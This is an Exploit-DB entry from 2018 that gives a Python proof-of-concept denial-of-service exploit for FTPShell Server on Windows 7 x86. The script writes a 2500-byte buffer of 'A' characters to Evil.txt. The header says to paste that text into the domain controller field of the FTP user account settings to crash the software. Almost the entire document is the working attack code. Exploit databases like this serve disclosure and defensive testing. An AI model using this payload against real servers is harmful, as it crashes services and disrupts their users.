EDB-ID: 44717 | Author: Hashim Jawad | Published: 2018-05-23 | CVE: N/A | Type: Dos | Platform: Windows_x86 | Vulnerable App: N/A | # Exploit Author: Hashim Jawad
# Date: 2018-05-23
# Vendor Homepage: http://www.ftpshell.com/
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm
# Tested on: Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under FTP user accounts paste contents of Evil.txt in domain controller field
#!/usr/bin/python
buffer = '\x41' * 2500
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e